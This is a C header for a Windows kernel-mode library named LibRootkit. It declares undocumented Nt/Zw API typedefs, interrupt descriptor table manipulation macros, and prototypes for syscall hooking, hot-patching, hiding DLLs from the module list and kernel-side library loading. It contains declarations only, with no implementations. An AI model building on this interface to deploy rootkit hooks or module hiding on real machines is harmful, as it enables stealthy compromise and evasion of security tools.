#ifndef __LIBR_H__
#define __LIBR_H__
#include <ntddk.h>
#include <WinDef.h>
#include <ntstrsafe.h>
#include "sysdefs.h"


// Undefine these to turn off different log levels. The use_xxx shit is
// to prevent you from using these as the log defines accidentally
#define LOG_WARN  	use_LR_WARN_plzkthx
#define LOG_NOTE    use_LR_NOTE_plzkthx
//#define LOG_DEBUG   use_LR_DEBUG_plzkthx



typedef NTSTATUS (NTAPI *ZWCREATESECTION)( OUT PHANDLE  SectionHandle, IN ACCESS_MASK  DesiredAccess, IN POBJECT_ATTRIBUTES  ObjectAttributes OPTIONAL, IN PLARGE_INTEGER  MaximumSize OPTIONAL, IN ULONG  SectionPageProtection, IN ULONG  AllocationAttributes, IN HANDLE  FileHandle OPTIONAL);
typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE ProcessHandle,PROCESSINFOCLASS ProcessInformationClass,PVOID ProcessInformation,ULONG ProcessInformationLength,PULONG ReturnLength);
typedef NTSTATUS (NTAPI *ZWCREATEPROCESSEX) (OUT PHANDLE ProcessHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,IN HANDLE ParentProcessHandle,IN BOOLEAN InheritObjectTable,IN HANDLE SectionHandle,IN HANDLE DebugPort,IN HANDLE ExceptionPort, IN HANDLE Unknown);
typedef NTSTATUS (NTAPI *ZWWRITEVIRTUALMEMORY) (HANDLE ProcessHandle,PVOID BaseAddress,PVOID Buffer,ULONG BufferLength,PULONG ReturnLength);
typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLE ProcessHandle,PVOID *BaseAddress,ULONG ZeroBits,PULONG AllocationSize,ULONG AllocationType,ULONG Protect);
typedef NTSTATUS (NTAPI *ZWPROTECTVIRTUALMEMORY)(HANDLE ProcessHandle,PVOID *BaseAddr,PULONG size, ULONG newprot, PULONG oldprot);
typedef NTSTATUS (NTAPI *ZWFLUSHINSTRUCTIONCACHE)( IN HANDLE   ProcessHandle, IN PVOID    BaseAddress OPTIONAL, IN ULONG    FlushSize);
typedef NTSTATUS (NTAPI *ZWQUERYVIRTUALMEMORY)( IN HANDLE  ProcessHandle, IN PVOID  BaseAddress, IN MEMORY_INFORMATION_CLASS  MemoryInformationClass, OUT PVOID  MemoryInformation, IN ULONG  MemoryInformationLength, OUT PULONG  ReturnLength  OPTIONAL);
typedef NTSTATUS (NTAPI *ZWTERMINATEPROCESS)( IN HANDLE ProcessHandle OPTIONAL, IN NTSTATUS ExitStatus ); 
typedef NTSTATUS (NTAPI *ZWFREEVIRTUALMEMORY)(HANDLE proc, PVOID* addr, PULONG size, DWORD dwfreetype);
typedef NTSTATUS (NTAPI *ZWMAPVIEWOFSECTION)( IN HANDLE  SectionHandle, IN HANDLE  ProcessHandle, IN OUT PVOID  *BaseAddress, IN ULONG  ZeroBits, IN ULONG  CommitSize, IN OUT PLARGE_INTEGER  SectionOffset  OPTIONAL, IN OUT PSIZE_T  ViewSize, IN SECTION_INHERIT  InheritDisposition, IN ULONG  AllocationType, IN ULONG  Protect);
typedef NTSTATUS (NTAPI *ZWREADVIRTUALMEMORY)(IN HANDLE ProcessHandle, IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG NumberOfBytesToRead, OUT PULONG NumberOfBytesRead OPTIONAL);
typedef NTSTATUS (NTAPI *ZWDEBUGACTIVEPROCESS)( IN HANDLE  Proc, IN HANDLE DebugObj);
typedef NTSTATUS (NTAPI *ZWCREATETHREAD)(OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes  OPTIONAL, IN HANDLE ProcessHandle, OUT PCLIENT_ID ClientId, IN PCONTEXT ThreadContext, IN PVOID InitialTeb, IN BOOLEAN CreateSuspended); 
typedef NTSTATUS (NTAPI *NTLOCKVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID *BaseAddress, PULONG NumberOfBytesToLock, ULONG LockType);
typedef NTSTATUS (NTAPI *NTUNLOCKVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID *BaseAddress, PULONG NumberOfBytesToLock, ULONG LockType);
typedef NTSTATUS (NTAPI *NTQUERYINFORMATIONTHREAD)(HANDLE Handle,
		THREADINFOCLASS InfoClass, PVOID Info, ULONG InfoLen, PULONG Retlen);

typedef NTSTATUS (NTAPI *NTUSERBUILDHWNDLIST) ( IN ULONG hDesktop OPTIONAL, IN ULONG hParentWnd, IN ULONG HwndListType, IN ULONG ThreadId, OUT ULONG ARG_5, OUT HWND* pWnd, OUT ULONG* nBufSize); 
typedef INT      (NTAPI *NTUSERINTERNALGETWINDOWTEXT)(HWND hWnd, LPWSTR lpString, INT nMaxCount);
typedef HWND     (NTAPI *NTUSERFINDWINDOWEX)(HWND hwndParent, HWND hwndChildAfter, PUNICODE_STRING ucClassName, PUNICODE_STRING ucWindowName, ULONG ARG5); 
typedef DWORD    (NTAPI *NTUSERQUERYWINDOW)(HWND hWnd, DWORD Index);


typedef struct _SystemAPIS
{
	ZWCREATETHREAD				ZwCreateThread;
	ZWCREATESECTION				ZwCreateSection;
	ZWQUERYINFORMATIONPROCESS	ZwQueryInformationProcess;
	ZWCREATEPROCESSEX			ZwCreateProcessEx;
	ZWWRITEVIRTUALMEMORY		ZwWriteVirtualMemory;
	ZWALLOCATEVIRTUALMEMORY     ZwAllocateVirtualMemory;
	ZWPROTECTVIRTUALMEMORY      ZwProtectVirtualMemory;
	ZWFLUSHINSTRUCTIONCACHE     ZwFlushInstructionCache;
	ZWQUERYVIRTUALMEMORY		ZwQueryVirtualMemory;
	ZWTERMINATEPROCESS          ZwTerminateProcess;
	ZWFREEVIRTUALMEMORY         ZwFreeVirtualMemory;
	ZWREADVIRTUALMEMORY			ZwReadVirtualMemory;
	ZWMAPVIEWOFSECTION			ZwMapViewOfSection;
    ZWDEBUGACTIVEPROCESS		ZwDebugActiveProcess;
	NTLOCKVIRTUALMEMORY			NtLockVirtualMemory;
	NTUNLOCKVIRTUALMEMORY		NtUnlockVirtualMemory;
	NTQUERYINFORMATIONTHREAD	NtQueryInformationThread;
}SystemAPIS;

extern SystemAPIS sa;

typedef enum _map_t {
	MAPPED_UNMAPPED,
	MAPPED_ALLOC,
	MAPPED_PROT_EXEC,
	MAPPED_INSTR_FLUSH
} map_t;

extern HANDLE logfile;

typedef struct _MappedRegion 
{
	ULONG base;
	SIZE_T extent;
	map_t mapped;
	union {
		wchar_t *name;
		char *c_name;
		DWORD key;
	};
	UCHAR num_mapped;
} MappedRegion;



#pragma pack(1)    // 2 works, too
typedef struct tagIDT
{
	WORD    wLimit;
	DWORD    dwBase;
} IDT, *PIDT;
#pragma pack()

#pragma pack(1)
typedef struct tagINT_VECTOR
{
    WORD    wLowOffset;        // LOWORD of the handler's offset
    WORD    wSelector;        // selector of the handler's offset
    BYTE    bAccess;        // 0-3: Type
                            // 4:    ?(=0)
                            // 5-6:    DPL
                            // 7:    Present
    BYTE    wUnused;        // 0, 0, 0, unused (binary)
    WORD    wHighOffset;    // HIWORD of the handler's offset
} INT_VECTOR, *PINT_VECTOR;
#pragma pack()

#define VEC_TO_HANDLER( _vec ) \
	((_vec).wLowOffset | (_vec).wHighOffset << 16)

#define HANDLER_TO_VEC( _vec, _dword ) \
	(_vec).wLowOffset = (WORD)_dword; \
	(_vec).wHighOffset = (WORD)( (DWORD)_dword >> 16 );


#define VEC_GET_DPL( _vec ) \
	( _vec.bAccess & 0x60 ) >> 4
#define VEC_SET_DPL( _vec, _value ) \
	_vec.bAccess &= 0x9F; \
	_value << 4; \
	_vec.bAccess |= (BYTE)_value;
#define VEC_IS_PRESENT( _vec ) \
	_vec.bAccess >> 7
#define VEC_SET_PRESENT( _vec ) \
	_vec.bAccess |= 0x80;
#define VEC_GET_TYPE( _vec ) \
	_vec.bAccess & 0xF0
#define SELECTOR_GET_RPL( _sel ) \
	_sel & 0x3
#define SELECT_SET_RPL( _sel, _rpl ) \
	_sel &= 0xFFC; \
	_sel |= (WORD)_rpl;

#define PAGE_ROUND_DOWN(page) (((DWORD)(page)) & 0xfffff000)

VOID
GetINTVector( 
        IN    PIDT        pIdt, 
        IN    UCHAR        iVector, 
        OUT    PINT_VECTOR    pVector );

VOID
SetINTVector( 
		IN    PIDT        pIdt, 
        IN    UCHAR        iVector, 
        IN    PINT_VECTOR    pVector );
VOID
LoadIDT( 
		OUT    PIDT        pIdt );



int LibRootkit_Init();

void LogDebug(char *ptr, ...);
PVOID BorrowBytesFromPeb(PVOID storage, ULONG len);
void ReturnBytesToPeb(PVOID borrowed, PVOID storage, ULONG len);
PVOID BorrowBytesFromTeb(PVOID storage, ULONG len);
void ReturnBytesToTeb(PVOID borrowed, PVOID storage, ULONG len);
int region_contains(MappedRegion *region, ULONG addr);
MappedRegion *find_region(MappedRegion *tosrch, ULONG len, ULONG addr);
ULONG GetProcessIDForHandle(HANDLE ProcessHandle);
MPEB *GetPebForHandle(HANDLE ProcessHandle);
PVOID GetPebForHandleExternal(HANDLE ProcessHandle);
PVOID GetCurrentTeb();
MPEB *GetCurrentPeb();
BOOL HandleIsCurrentProcess(HANDLE ProcessHandle);
BOOL PebMatchesTarget(MPEB *mypeb, wchar_t *tgt);
BOOL IsTargetExternal(HANDLE External, wchar_t *tgt);
BOOL IsTargetCurrent(HANDLE External, wchar_t *tgt);
int ProcessIsNX(HANDLE ProcessHandle);
int ProcessorSupportsNX();
NTSTATUS MakeProcessNX(HANDLE ProcessHandle);
PServiceDescriptorTableEntry_t GetShadowTable();
ULONG NTAPI RtlUniform (PULONG Seed);
PLDR_DATA_TABLE_ENTRY RemoveHandleFromModuleList(PLIST_ENTRY Head, 
		HANDLE dll_handle);
PLDR_DATA_TABLE_ENTRY RemoveNameFromModuleList(PLIST_ENTRY Head, 
		const wchar_t *dll_name);
void BigKernelLock(void);
void BigKernelUnLock(void);
NTSTATUS MyProbeAndLockPages(HANDLE proc, DWORD start, DWORD end);
NTSTATUS ProbeForWriteStatus(PVOID towrite, SIZE_T len, ULONG align);
NTSTATUS ProbeForReadStatus(PVOID toread, SIZE_T len, ULONG align);
HANDLE KLoadLibrary(const wchar_t *full_dll_path);
DWORD KGetProc(HANDLE hMod, char *lpFunctionName);
DWORD KGetProcAddress(HANDLE hMod, char *lpFunctionName);
WORD KGetSyscallIndex(HANDLE dll, char *syscall);
void KFreeLibrary(HANDLE hMod);
DWORD GetSyscall(HANDLE dll, char *syscall);
DWORD HookSyscall(HANDLE dll, char *syscall, DWORD NewFcn);
DWORD FindFirstInsnBoundary(unsigned char *funcStart, int reqSpace);
NTSTATUS SetupHotPatch(DWORD ToPatch, DWORD Tgt, DWORD PatchBuf, ULONG BufSize);
NTSTATUS UndoHotPatch(DWORD Patched, DWORD PatchBuf);

#define LOG_DIR	L"C:\\dev"

#ifdef LOG_TO_FILE
# define LOGFCN(args) LogDebug args
#else
# define LOGFCN(args) DbgPrint args
#endif


#ifdef LOG_WARN
# define LR_WARN(args) LOGFCN(args)
#else
# define LR_WARN(args) ((void)0)
#endif

#ifdef LOG_NOTE
# define LR_NOTE(args) LOGFCN(args)
#else
# define LR_NOTE(args) ((void)0)
#endif

#ifdef LOG_DEBUG
# define LR_DEBUG(args) LOGFCN(args)
#else
# define LR_DEBUG(args) ((void)0)
#endif



#endif
